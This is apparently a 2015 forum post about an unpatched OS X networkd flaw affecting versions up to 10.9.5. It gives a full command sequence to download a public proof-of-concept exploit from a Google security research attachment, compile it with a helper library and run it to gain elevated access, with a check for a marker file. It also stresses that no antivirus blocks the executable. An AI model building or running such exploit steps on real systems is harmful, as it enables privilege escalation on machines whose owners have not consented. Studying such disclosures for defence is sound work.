OS X currently has at least one active "zero day" (it was released to the public after 90 days of no fix from Apple). It exploits a flaw with the networking daemon to gain shell access.
This flaw is exploitable on =<10.9.5. Yosemite is not affected. More alarming is that no antivirus currently blocks this executable.
Build the proof of concept:
gcc # launches dev tool installer if not present
mkdir /tmp/networkd_poc
cd /tmp/networkd_poc
git clone firstname.lastname@example.org:rodionovd/liblorgnette.git
curl 'https://google-security-research.googlecode.com/issues/attachment?aid=1210000000&name=sysmond_exploit_writeup.c&token=ABZ6GAe572CH9_WQUWSd2SBooTBV6ZZMjw%3A1421968517496' > networkd_exploit.c # may need to replace with your own link from https://code.google.com/p/google-security-research/issues/detail?id=121
clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
./networkd_exploit
ls /tmp | grep hello_ # should see hello_networkd
Edited by iangcarroll, 22 January 2015 - 06:22 PM.